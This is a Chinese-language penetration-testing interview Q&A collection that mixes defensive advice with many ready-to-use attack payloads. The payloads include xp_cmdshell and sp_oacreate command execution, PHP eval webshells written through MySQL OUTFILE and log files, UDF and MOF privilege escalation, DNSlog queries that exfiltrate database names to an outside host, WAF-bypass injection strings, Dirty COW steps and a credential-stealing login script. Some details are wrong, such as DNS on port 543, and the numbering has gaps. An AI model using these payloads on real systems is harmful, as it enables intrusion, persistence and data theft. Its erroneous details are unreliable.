来源如下图:(微信公众号:0x00实验室)
00 - 拿到目标站以后的渗透思路?
渗透测试流程:
- 项目前期准备工作
- 信息收集:whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息
- 漏洞扫描:Nessus, AWVS
- 手动挖掘:逻辑漏洞
- 验证漏洞
- 修复建议
- (如果有)基线检查/复验漏洞
- 输出报告
01 - 如何绕过CDN查真实IP?
- 多地ping看是否有cdn
- 邮件订阅或者rss订阅
- 二级域名可能不会做cdn
- nslookup http://xxx.com 国外dns
- 查找域名历史解析记录,因为域名在上CDN之前用的IP,很有可能就是CDN的真实源IP地址
- phpinfo上显示的信息
- cloudflare github可以获取真实IP
- 一个网站有icon 可以根据icon hash 来查找真实IP
- 子域名绑定 测试子域可能回源
02 - sleep函数被禁用后怎么进行sql注入?
BENCHMARK,Get_lock函数,当都被禁用后可以用计算量比较大的语句使数据库查询时间变长,从而达到延时注入的效果。
mysql:`AND (SELECT count(*) FROM information_schema.columns A,
information_schema.columns B, information_schema.SCHEMATA C);
03 - 哪些地方存在xxe?架构问题?
xxe常见场景是如pdf在线解析、word在线解析、定制协议,留言板等,跟逻辑设计有关而与
语言无关,最好是不要让XML作为参数传输或整体结构可被用户篡改。如果一定要使用,至少要禁用DTD、Entity。
xxe危害:读取本地文件,执行系统命令,探测内网端口,攻击内网服务探测内网端口的协议有gopher file dict,不同语言支持不同的协议,是具体情况而定file http ftp是常用的
防范,python用lxml时可以对resolve_entities设为false。或者过滤用户提交的xml
客户端也可以有xxe攻击,有的网站会使用office打开docx进行解析Java解析XML的常用三方库,如果不禁用DTD、Entity都会导致XXE漏洞:
javax.xml.stream.XMLStreamReader;
javax.xml.parsers.DocumentBuilderFactory;
04 - 如何绕过Http-only?
HTTP-Only禁止的是JS读取cookie信息,Http Trace攻击就可以将你的Header里的
Cookie回显出来,利用Ajax或者flash就可以完成这种攻击;或者配置或者应用程序上可能
Bypass,比如header头的泄漏
05 - SQL二次注入?
第一次进行数据库插入数据的时候,仅仅只是使用了`addslashes`或者是借助`get_magic_quotes_gpc`对其中的特殊字符进行了转义,在写入数据库的时候还是保留了
原来的数据,但是数据本身还是脏数据。
在将数据存入到了数据库中之后,开发者就认为数据 是可信的。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一 步的检验和处理,这样就会造成SQL的二次注入。
交友网站,填写年龄处是一个注入点,页面会显示出与你相同年龄的用户有几个。使用and
1=1确定注入点,用order by探测列数,union select探测输出点是第几列,
- 爆库 `group_concat(schema_name) from information_schema.schemata`
- 爆表 `group_concat(table_name) from information_schema.schemata where table_schema='hhh'`
- 获取数据 `concat(flag) from flag`
修复:在从数据库或文件中取数据的时候,也要进行转义或者过滤。
06 - SQLserver提权
xp_cmdshell提权
- xp_cmdshell是Sql Server中的一个组件,可以用来执行系统命令,在拿到sa口令之后,经常可以通过xp_cmdshell来进行提权
前提
- getshell或者存在sql注入并且能够执行命令。
- sql server是system权限,sql server默认就是system权限
启用xp_cmdshell
- EXEC master..sp_configure 'show advanced options', 1;RECONFIGURE;EXEC master..sp_configure 'xp_cmdshell', 1;RECONFIGURE;
# 通过xp_cmdshell执行系统命令
- Exec master.dbo.xp_cmdshell 'whoami' sp_oacreate提权在xp_cmdshell被删除或者出错情况下,可以充分利用SP_OACreate进行提权,
前提:
- 需要同时具备sp_oacreate和sp_oamethod两个功能组件
开启组件
- EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'Ole Automation Procedures', 1;RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0;
执行系统命令(无回显)
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami'
通过沙盒执行命令
- 开启沙盒
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxM ode','REG_DWORD',1
- 利用jet.oledb执行命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32
\ias\dnary.mdb','select shell("whoami")')
- 通过Agent Job执行命令
修改开启Ageent Job,执行无回显CobaltStrike生成powershell上线
07 - GPC是什么?GPC之后怎么绕过?
如果`magic_quotes_gpc=On`,PHP解析器就会自动为post、get、cookie过来的数据
增加转义字符“\”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符(认为是
php的字符)引起的污染。
08 - 如何防范webshell
防范的措施大概有三种
- 第一种的思路是将专门存放上传文件的文件夹里面的脚本类型文件,解析成其他类型的文件, 服务器不会以脚本类型来执行它。
- 第二种是匹配文件夹里的脚本类型文件,将其设置为无法读取及操作。
- 第三种是将文件上传到一个单独的文件夹,给一个二级的域名,然后不给这个虚拟站点解析脚 本的权限,听说很多网站都用这种方式。
09 - webshell检查思路
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。
黑客通过浏览器以HTTP协议访问Web Server上的一个CGI文件,是一个合法的TCP连接,TCP/IP的应用层之下没有任何特征,只能在应用层进行检测。黑客入侵服务器,使用
webshell,不管是传文件还是改文件,必然有一个文件会包含webshell代码,很容易想到
从文件代码入手,这是静态特征检测;webshell运行后,B/S数据通过HTTP交互,HTTP请
求/响应中可以找到蛛丝马迹,这是动态特征检测。
- 静态检测
静态检测通过匹配特征码,特征值,危险函数函数来查找webshell的方法,只能查找已知的 webshell,并且误报率漏报率会比较高,但是如果规则完善,可以减低误报率,但是漏报率 必定会有所提高。优点是快速方便,对已知的webshell查找准确率高,部署方便,一个脚本 就能搞定。缺点漏报率、误报率高,无法查找0day型webshell,而且容易被绕过。
- 静态检测配合人工
一个检查工具:GitHub - he1m4n6a/findWebshell: findWebshell是一款基于python开发的webshell检测工具。
- 动态检测
Linux下就是nobody用户起了bash,Win下就是IIS User启动cmd,这些都是动态特征。
再者如果黑客反向连接的话,那很更容易检测了,Agent和IDS都可以抓现行。Webshell总
有一个HTTP请求,如果我在网络层监控HTTP,并且检测到有人访问了一个从没反问过得文
件,而且返回了200,则很容易定位到webshell,这便是http异常模型检测,就和检测文件
变化一样,如果非管理员新增文件,则说明被人入侵了。缺点也很明显,黑客只要利用原文件 就很轻易绕过了,并且部署代价高,网站时常更新的话规则也要不断添加。
- 日志检测
使用Webshell一般不会在系统日志中留下记录,但是会在网站的web日志中留下Webshell页 面的访问数据和数据提交记录。日志分析检测技术通过大量的日志文件建立请求模型从而检测 出异常文件,称之为:HTTP异常请求模型检测。
- 寻找webshell
- 自动化查找 D盾 河马 fotify
- 手动查找 windows sublime、全文件夹查找 IDE PHPSTOR、全局查找 Linux、命令查找 `grep -rn "eval(" *` webshell特征 PHP的危险函数还有`phar <?php XXXXX`
10 - 如何查找DNS解析记录
- 查看浏览器缓存
- 查看系统缓存
- 查看路由器缓存
- 查找ISP DNS缓存
- 递归搜索。根据网址,发送一个DNS请求,UDP请求,端口为543,会请求一个 DNS服务器,DNS服务器会不断递归查找这个网址的IP
11 - 登录页面的漏洞
- 注入点以及万能密码
- 敏感信息泄露
- 验证码绕过
- 无限注册帐号
- 任意密码重置
- 明文传输
- 越权漏洞
12 - 如何快速判定XSS类型?
存储型XSS:你发送一次带XSS代码的请求,以后这个页面的返回包里都会有XSS代码;
反射型XSS:你发送一次带XSS代码的请求,只能在当前返回的数据包中发现XSS代码;
DOM型XSS:你发送一次带XSS代码的请求,在返回包里压根儿就找不到XSS代码的影子;
CSP策略:浏览器内容安全策略,减少xss攻击。
13 - CSRF、SSRF和重放攻击有什么区别?
- CSRF是跨站请求伪造攻击,由客户端发起
- SSRF是服务器端请求伪造,由服务器发起重放攻击是将截获的数据包进行重放,达到身份认证等目的
14 - CSRF 和 XSS 和 XXE 有什么区别,以及修复方式?
XSS是跨站脚本攻击,用户提交的数据中可以构造代码来执行,从而实现窃取用户信息等攻击。
修复方式:对字符实体进行转义、使用HTTP Only来禁止JavaScript读取Cookie值、输入时校验、浏览器与Web应用端采用相同的字符编码。
CSRF是跨站请求伪造攻击,XSS是实现CSRF的诸多手段中的一种,是由于没有在关键操作执行时进行是否由用户自愿发起的确认。
修复方式:筛选出需要防范CSRF的页面然后嵌入Token、 再次输入密码、检验Referer.
XXE是XML外部实体注入攻击,XML中可以通过调用实体来请求本地或者远程内容,和远程文件保护类似,会引发相关安全问题,例如敏感文件读取。修复方式:XML解析库在调用时严格禁止对外部实体的解析。
15 - MongoDB注入方式
利用正则:找到y开头的name `db.items.find({name: {$regex:"^y"}})`
一些payload
- `?login[$regex]=^&password[$regex]=^`
- `?login[$not][$type]=1&password[$not][$type]=1`
16 - mysql的网站,5.0以上和5.0以下有什么区别?
5.0 以下没有information_schema这个系统表,无法列表名等,只能暴力跑表名。
5.0 以下是多用户单操作,5.0以上是多用户多操作
17 - MySQL写shell的问题
1. 写shell用什么函数?
- `select '<?php phpinfo()> into outfile 'D:/shelltest.php'`
- `dumpfile`
- `file_put_contents`
2. outfile不能用了怎么办?
`select unhex('udf.dll hex code') into
dumpfile 'c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll';`可以UDF提权
https://www.cnblogs.com/milantgh/p/5444398.html
3. dumpfile和outfile有什么不一样?outfile适合导库,在行末尾会写入新行并转义,
因此不能写入二进制可执行文件。
4.sleep()能不能写shell?
5. 写shell的条件?
- 用户权限
- 目录读写权限
- 防止命令执行:`disable_functions`,禁止了`disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source`,但是可以用dl扩展执行命令或者ImageMagick漏洞
open_basedir: 将用户可操作的文件限制在某目录下mysql写shell的条件
- 网站可访问路径的绝对路径
- secure_file_priv 的值非NULL或包含了导出的绝对路径 secure_file_priv的值在mysql配置文件my.ini中设置,这个参数用来限制数据导入导出 Mysql>=5.5.53 默认为NULL,即默认禁止导入导出Mysql<5.5.53 默认为空,即默认无限制
- mysql服务有对网站可访问路径的写权限
- mysql连接用户有FILE权限/ROOT用户或ROOT权限
- GPC关闭//未对闭合用的引号转义
outfile 和 dumpfile的路径不支持hex,必须有引号包裹
## mysql日志写shell
与导出函数写Shell相比,规避了 secure_file_priv 的限制
- 网站可访问路径的绝对路径
- mysql服务有对网站可访问路径的写权限
- mysql连接用户有权限开启日志记录和更换日志路径/ROOT权限
- GPC关闭/未对闭合用的引号转义
虽然日志路径可以hex编码,但被记入日志的查询语句中的shell内容需要引号包裹,加
`\`后传到数据库执行会报错,无法记录进日志
root权限
GPC 关闭(能使用单引号),magic_quotes_gpc=On
有绝对路径(读文件可以不用,写文件必须)
没有配置–secure-file-priv
成功条件:有读写的权限,有 create、insert、select 的权限
18 - disable_functions绕过
- 黑名单总有漏网之鱼,多尝试一些函数
- LD_PRELOAD:原理就是劫持系统函数,使程序加载恶意动态链接库文件,从而执行系统命令等敏感操作
- lmageMagick:利用lmageMagick命令执行漏洞(CVE-2016-3714)
- Windows系统组件COM绕过
- PHP7.4FFI绕过
- 利用Bash破壳(CVE-2014-6271)漏洞绕过
- 利用imap_open()绕过(CVE-2018-19518)
- 利用pcntl插件绕过
19 - 拿到webshell不出网情况下怎么办
reg上传去正向连接。或探测出网协议,如dns,icmp
20 - 脏牛提权漏洞
脏牛漏洞,Dirty COW, CVE-2016-5195
漏洞范围:Linux内核 >= 2.6.22
简要分析:该漏洞具体为,Linux内核的内存子系统在处理写入复制(copy-on-write,
COW)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对
只读内存映射进行写访问。竞争条件,指的是任务执行顺序异常,可导致应用崩溃,或令攻击者有机可乘,进一步执行其他代码。利用这一漏洞,攻击者可在其目标系统提升权限,甚至可能获得root权限
步骤:
- 查看系统版本和用户权限
- 下载exp到本地 使用gcc -pthread dirty.c -o dirty -lcrypt命令对dirty.c 进行编译,生成一个dirty的可执行文件
- 执行./dirty 密码命令,即可进行提权
23 - sqlmap的--level和--risk的区别
level级别越高发送的请求越多,并且在level3以上时会尝试对referer注入。
而risk则是风险系数,默认是1会测试大部分的测试语句,2会增加基于事件的测试语句,3会
增加OR语句的QL注入测试。在有些时候,例如在UPDATE的语句中,注入一个OR的测试语句, 可能导致更新的整个表,可能造成很大的风险
24 - 存储型XSS怎么利用?
XSS攻击的原理是通过修改或者添加页面上的JavaScript恶意脚本,在浏览器渲染页面的时 候执行该脚本,从而实现窃取COOKIE或者调用Ajax实现其他类型的CSRF攻击,还可以插入beef进行钓鱼等
- CORS(浏览器同源策略)
- js =>ajax 去请求其他网站的东西
- test.com 根据浏览器的CORS策略 他只能在test.com里面请求东西
- test.com 调用ajax 去访问 xxxx.com assdasd.test.com 如果目标的CORS头 默认不放行test.com 这样 test.com 的ajax请求就不会访问其他网站
25 - MYSQL 数据库的站,只有一个 80 端口开放?
更改了端口 站库分离;3306端口不对外开放。
26 - 审查上传点的元素有什么意义
有些站点的上传文件类型限制是在前端实现的,这时只要增加上传类型就能
突破限制了。
27 - 3389 无法连接
没开放 3389 端口;端口被修改;防护拦截;处于内网(需进行端口转发)
28 - 目标站无防护,上传图片可以正常访问,上传脚本格式访问则 403
有可能Web服务器配置把上传目录写死了不执行相应脚本,尝试改后缀名绕过。
29 - Mysql几种提权方式
Mysql_UDF 提权
利用了root高权限,创建带有调用 cmd 的函数的 udf.dll 动态链接库,
导出 udf.dll 文件后,我们就可以直接在命令框输入 cmd
限制条件:
- MySQL 数据库没有开启安全模式(确认secure_file_priv=''是否为空)
- 已知的数据库账号具有对MySQL数据库insert和delete的权限,最好是root最高权限。
- shell有写入到数据库安装目录的权限。
MOF提权:
MOF提权是一个有历史的漏洞,基本上在Windows Server 2003的环境下才可以成功。提权的原理是C:/Windows/system32/wbem/mof/目录下的mof文件每隔一段时间(几秒钟左
右)都会被系统执行,因为这个 MOF 里面有一部分是 VBS脚本,所以可以利用这个VBS脚本 来调用CMD来执行系统命令,如果 MySQL有权限操作 mof 目录的话,就可以来执行任意命令了。
30 - 针对token的测试 会注意哪些方面?
针对token的攻击,一是对它本身的攻击,重放测试一次性、分析加密规则、校验方式是否正
确等,二是结合信息 泄露漏洞对它的获取,结合着发起组合攻击信息泄露有可能是缓存、日
志、get,也有可能是利用跨站很多跳转登录的都依赖token,有一个跳转漏洞加反射型跨站
就可以组合成登录劫持了另外也可以结合着其它业务来描述token的安全性及设计不好怎么被
绕过比如抢红包业务之类的
31 - token和refer横向对比 谁安全等级高?
token安全等级更高,因为并不是任何服务器都可以取得referer,如果从HTTPS 跳到
HTTP,也不会发送referer。并且FLASH一些版本中可以自定义referer。但是token的
话,要保证其足够随机且不可泄露。(不可预测性原则)
32 - SQL注入写shell 单引号被过滤咋办?
写 shell: root 权限,GPC 关闭,知道文件路径outfile函数
http://127.0.0.1:81/sqli.php?id=1 into outfile
C:\\wamp64\\www\\phpinfo.php' FIELDS
TERMINATED BY '<?php phpinfo(); ?>'
http://127.0.0.1:81/sqli.php?id=-1 union select
1,0x3c3f70687020706870696e666f28293b203f3e,3,4 into outfile
C:\\wamp64\\www\\phpinfo.php'`
宽字节注入
代替空格的方法
%0a、%0b、%a0 等/**/ 等注释符<>
33 - 宽字节注入的原理?
产生原理
在数据库使用了宽字符集而WEB中没考虑这个问题的情况下,在WEB层,由于 0XBF27是两个 字符,在PHP中比如addslash和 magic_quotes_gpc 开启时,由于会对 0x27 单引号进 行转义,因此0xbf27会变成0xbf5c27,而数据进入数据库中时,由于 0XBF5C 是一个另外
的字符,因此\转义符号会被前面 的 bf 带着"吃掉",单引号由此逃逸出来可以用来闭合语句。
根本原因
character_set_client(客户端的字符集)和 character_set_connection(连接层的
字符集)不同,或转换函数
如iconv、mb_convert_encoding使用不当。
解决办法
统一数据库、Web 应用、操作系统所使用的字符集,避免解析产生差异,最好都设置为 UTF- 8。或对数据进行正确的转义,如mysql_real_escape_string+mysql_set_charset的使用。
34 - img标签除了onerror属性外,还有其他获取管理员路径的办法?
- 服务器修改apache配置文件,配置.jpg文件以php方式来解析AddType application/x-httpd-php .jpg <img src=http://xss.tv/1.jpg> 会以php方 式来解析
- c定一个远程的脚本文件,获取 referer
35 - 代码执行、文件读取、命令执行函数有哪些?
1)代码执行:
eval,preg_replace+/e,assert,call_user_func,call_user_func_array,cre
ate_function
2)文件读取:
file_get_contents(),highlight_file(),fopen(),read
file(),fread(),fgetss(),
fgets(),parse_ini_file(),show_source(),file()等
3)命令执行:
system(), exec(), shell_exec(), passthru() ,pcntl_exec(),
popen(),proc_open()
36 - 为什么aspx木马权限比asp大?
aspx使用的是.net技术。IIS中默认不支持,ASP只是脚本语言而已。入侵的时候asp的木马
一般是guest权限…APSX的木马一般是users权限。
37- 提权为何选择可读写目录?不用带空格的目录?
因为exp执行多半需要空格界定参数
38 - 有shell情况下如何使用xss实现对目标站的长久控制?
后台登录处加一段记录登录账号密码的 js,并且判断是否登录成功,如果登录成功,就把账
号密码记 录到一个生僻的路径的文件中或者直接发到自己的网站文件中。(此方法适合有价值
并且需要深入控 制权限的网络)。 在登录后才可以访问的文件中插入XSS脚本
39 - 发现uid=100注入点,获取shell的思路?
有写入权限的,构造联合查询语句使用 using INTO OUTFILE,可以将查询的输出重定向到
系统的文件中,这样去写入WebShell使用sqlmap –os-shell原理和上面一种相同,来直
接获得一个Shell,这样效率更高通过构造联合查询语句得到网站管理员的账户和密码,然后
扫后台登录后台,再在后台通过改包上传等方法上传Shell.
40 - 如何拿一个站点的webshell?
上传,后台编辑模板,sql注入写文件,命令执行,代码执行,一些已经爆出的cms 漏洞,比
如dedecms后台可以直接建立脚本文件,wordpress上传插件包含脚本文件zip压缩包等
41 - 手工判断目标站是Windows还是Linux?
1. Linux大小写敏感 Windows不敏感
2. 通过Ping的值 TTL
Linux值 64或者255
win 32 128
unix 255
42 - SVN/GIT 源代码泄露
- 在使用 SVN 管理本地代码过程中,会自动生成一个名为.svn 的隐藏文件 夹,其中包含重要的源代码信息/.git/config
- 使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起git泄露漏洞/.svn/entries
43 - 项目上漏洞扫描需注意哪些?
跟客户确认是否充许登录扫描、扫描并发连接数及线程数、是否充许暴力破确,什么时间扫
描、通知客户备份一下数据,开启业务系统及网站运维监控,以免断机可及时恢复
44 - Mysql注入点,工具对目标站点写一句话 需要哪些条件?
root权限、网站的绝对路径、需要数据库开启 secure_file_priv相当于
secure_file_priv的值为空,不为空不充许写入webshell(默认不开启,需要修改
my.ini 配置文件)
45 - 为何一个mysql数据库的站,只有一个80端口开放
- 更改了数据库端口,没有扫描出来。
- 站库分离。
- 3306 端口不对外开放
46 - 报错注入的函数?
updatexml、extractvalue、floor、exp
47 - Post和Get都做了防注入,可以采用什么方式绕过?
Cookies注入绕过
48 - SQL注入只能查帐号密码?
最低权限都可以查找帐号和密码,如 mssql sa 权限可以获取系统权限,dbowner 可以获
取 Webshell,public 可以脱库;mysql root 权限、知道网站的绝对路径、数据库
my.ini 配置文件 secure_file_priv 值为空时,就可以获取 webshell 并执行操作系
统命令。
49 - sqlmap,怎么对一个注入点注入?
- 如果是 get 注入,直接,sqlmap -u "注入点网址".
- 如果是 post 注入,可以 sqlmap –r "burp 地址访问包”
- 如果是 cookie,X-Forwarded-For等,可以访问的时候,用burpsuite抓包,注入处 用号替换,放到文件里,然后sqlmap -r "文件地址",记得加上—level 3参数
50 - SQL注入的防护方法?
- 涵数过滤,如!is_numeric 涵数 //判断变量 id 是否为数字
- 直接下载相关防范注入文件,通过 incloud 包含放在网站配置文件里面,如 360、阿里 云、腾迅提供的防注入脚本
- 使用白名单来规范化输入验证方法
- 采用 PDO 预处理
- 使用 Waf 拦截
51 - 盲注IF被过滤怎么绕过?
如果 and if 被 waf 拦截,我们可以使用内联注释来绕过函数的检测,如:
xor /*!if*/(length(/*!database*//*!()*/)>=1,/*!sleep*//*!
(1)*/,curdate())%23
^ /*!if*/(length(/*!database*//*!()*/)>=1,/*!sleep*//*!
(1)*/,curdate())%23
/*!if*/(length(/*!database*//*!()*/)>=1,/*!sleep*//*!
(1)*/,curdate())%23
and case when 1!=0 then /*!sleep*//*!(5)*/ else 0 end %23
52 - SQL注入无回显,利用DNSlog如何构造?
- 没有回显的情况下,一般编写脚本,进行自动化注入。但与此同时,由于 防火墙的存在,容易被封禁 IP,可以尝试调整请求频率,有条件的使用代理池 进行请求。
- 此时也可以使用 DNSlog 注入,原理就是把服务器返回的结果放在域 名中,然后读取 DNS 解析时的日志,来获取想要的信息。
- Mysql 中利用load_file()构造payload ‘ and if((select load_file(concat(‘\\\\’,(select database()),’.xxx.ceye.io\\abc’))),1,0)#
- Mssql 下利用 master..xp_dirtree 构造 payload DECLARE @host varchar(1024);SELECT @host=(SELECT db_name())+’.xxx.ceye.io’;EXEC(‘master..xp_dirtree”\’+@host+’ \foobar$”‘);
53 - PHPadmin写shell的方法?
一、常规导入 shell 的操作
创建数据表导出 shell
CREATE TABLE `mysql`.`shadow9` (`content` TEXT NOT NULL );
INSERT INTO `mysql`.`shadow9` (`content` ) VALUES (‘<?php
@eval($_POST[pass]);?>’);
SELECT `content` FROM `shadow9` INTO OUTFILE
‘C:\\phpStudy\\WWW\\90sec.php’;
DROP TABLE IF EXISTS `shadow9`;
二、一句话导出shell:
select '<?php @eval($_POST[pass]);?>' into outfile 'c:/phpstu
dy/www/90sec.php';
select '<?php @eval($_POST[pass]);?>' into outfile 'c:\\phpst
udy\\www\\90sec.php';
select '<?php @eval($_POST[pass]);?>' into dumpfile 'c:\\phps
tudy\\www\\bypass.php';
三、日志备份获取 shell
show global variables like "%genera%"; //查询general_
log配置
set global general_log='on'; //开启 general log 模 式
SET global general_log_file='D:/phpStudy/WWW/cmd.php'; //设
置日志文件保存路径
SELECT '<?php phpinfo();?>'; //phpinfo()写入日志
文件
set global general_log='off'; //关闭 general_log模 式
54 - 预编译能不能百分百防御SQL注入?如不能请举例
$pdo->query('SET NAMES gbk');
$var = "\xbf\x27 OR 1=1 /*";
$query = 'SELECT * FROM test WHERE name = ? LIMIT 1';
$stmt = $pdo->prepare($query);
$stmt->execute(array($var)); #类似于宽字节注入
$dbh = new PDO("txf");
$name = $_GET['name'];
$stmt = $dbh->prepare('SELECT * FROM ' . $name . ' where usern
ame = :username');
$stmt->execute( array(':username' => $_REQUEST['username'])
);
#参数 name 是一串数组,PDO 不会生效
$stmt = $dbh->prepare('SELECT * FROM foo ORDER BY
:userSuppliedData');
#PDO对DDL不生效
55 - SQL注入时 and or 被过滤怎办?
- 大小写变形
- 编码
- 添加注释
- 双写法
- 利用符号形式
- 浮点数 #数字被注释
- 函数替代 #符号被注释
56 - 快速找文件下载漏洞?
一般链接形式:
download.php?path=
down.php?file=
data.php?file=
download.php?filename=
或者包含参数:
&Src=
&Inputfile=
&Filepath=
&Path=
&Data=
57 - 任意文件下载的防范方法?
- 过滤".",使用户在url中不能回溯上级目录
- 正则严格判断用户输入参数的格式
- php.ini 配置open_basedir限定文件访问范围
58 - CORS产生利用方式?绕过同源策略方式?
1 - CORS 全称是”跨域资源共享”(Cross-origin resource sharing),Origin源未 严格,从而造成跨域问题,允许浏览器向跨源服务器,发出 XMLHttpRequest请求
2 - Origin 为*的时候,使用 curl 测试 CORS,curl <url> -H “Origin: https://evil.com” -I 再寻找的 api 接口是否有敏感信息泄漏。
3 - 同源:协议相同、域名相同、端口相同,绕过同源策略限制的方法:
- document.domain 属性
- 片段识别符(URL 后加#号)
- window.name
- 跨文档通信 API
- JSONP
- CORS
- WebSockets
4-jsonp 跨域利用:获取 JSON 数据并编码发送到远程服务器
59 - XSS弹窗函数和常见的XSS绕过策略?
alert,confirm,prompt 三种函数
绕过策略:
- 大小写混合
- 双写
- 编码
- fuzz 低频使用标签 <details/open/ontoggle>
- fuzz 低频使用函数 ontoggle 等
- <img/src=1>
- %0a 或者%0d 绕过
60 - SSRF利用Redis写shell
1)SSRF 服务端请求伪造
- 对内网扫描,获取 banner
- 攻击运行在内网的应用,主要是使用 GET 参数就可以实现的攻击(比如 Struts2,sqli 等)
- 利用协议读取本地文件
- 云计算环境 AWS Google Cloud 环境可以调用内网操作 ECS 的 API
2)如 webligic SSRF 漏洞
通过 SSRF 的 gopher 协议操作内网的 redis,利用 redis 将反弹 shell 写入
crontab 定时任务,url 编码,将\r 字符串替换成%0d%0a
61 - 登录页面可能存在的漏洞?
62 - 描述一下第三方应用软件提权方法?
- Serv-u 安全性测试(分为有配置文件有修改权限与 servUDaemon.exe 默认管理员帐号和密码没修改进行提权)
- FlashFXP 安全性测试(攻击者只需通过 webshell 下载 quick.dat、 sites.dat、stats.dat这三个文件进行本地替换,就可以用星号查看器直接查看连接密码)
- Gene6 FTP 安全性测试(Gene6 FTP 默认安装路径是 C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini 其中 Remote.ini 是主配置文件,管理员登 录的 ip、端口和密码都存储在这。但 Gene6 管理员帐号只充许本地登录。 对于渗透测试人 员来讲只需要通过 Webshell 转发端口就可以进行远程连接)
- PcanyWhere 安全性测试(找到pcanywhere 安装目录下面的*.CIF 直接用工具破解 密码就行)
- VNC安全性测试(通过脚本大马读取 VNC 连接密码: HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password)
- Radmin 安全性测试(导出注册表 hash,用 Radmin 的 hash 版连接就行)
- Zend 安全性测试(攻击者只需要通过 webshell对原 ZendExtensionManager.dll 重命名,并通过工具重新生成一个来木马 ZendExtensionManager.dll 让 apche 重启 加载。服务器就会被控制)
- 启动项安全性测试
- 服务替换安全性测试
- Dll 劫持安全性测试(直接用Tools lpk sethc v4.0 生成 dll马通过 webshell 上传到杀毒软件,输入法等管理员常运行exe软件目录,等着dll 劫持)
- Perl安全性测试(低版本可以直接执行系统命令)
63 - xpcmdshell禁用了有什么方法提权
可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的步
骤可参考:
用查询分析器,依次执行下面的语句,就可以了.
USE master
EXEC sp_configure 'show advanced options', 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'show advanced options', 0
就可以顺利的执行 CMDSHELL 了
64 - 网站后台Getshell的方法?
webshell路径直接上传
数据库备份getshell
修改网站上传类型配置拿webshell
执行sql语句写入webshell
通过数据库拿webshell
命令执行拿webshell
phpmyadmin写sehll
65 - fastjson不出网怎么利用
目前公开已知的poc有两个:
- com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
- org.apache.tomcat.dbcp.dbcp2.BasicDataSource
第一种利用方式需要一个特定的触发条件:
解析JSON的时候需要使用Feature才能触发,参考如下代码:
JSONObject.parseObject(sb.toString(), new Feature[] {Feature.SupportNonPublicField});
第二种利用方式:则需要应用部署在Tomcat应用环境中,因为Tomcat应用环境自带
tomcat-dbcp.jar 对于SpringBoot这种自带Tomcat可以直接以单个jar文件部署的需要
在maven中配置tomcat- dbcp。
而且对于不同的Tomcat版本使用的poc也不同:
- Tomcat 8.0以后使用:org.apache.tomcat.dbcp.dbcp2.BasicDataSource• Tomcat
- 8.0以下使用: org.apache.tomcat.dbcp.dbcp.BasicDataSource
66 - 遇到XXE盲注怎么办?
如果遇到XXE无回显注入的话,可以选择使用DNS外带和外部参数实体注入
- 在攻击者自己的公网服务器,准备一个test.dtd通过base64为将读取的内容加密得到的值当作传参值,发送给攻击者的公网服务器
- 受害者那边,通过外部参数实体注入访问攻击者公网服务器下的test.dtd文件 3-最后看 攻击者公网服务器的日志,转码得到受害者服务器的内容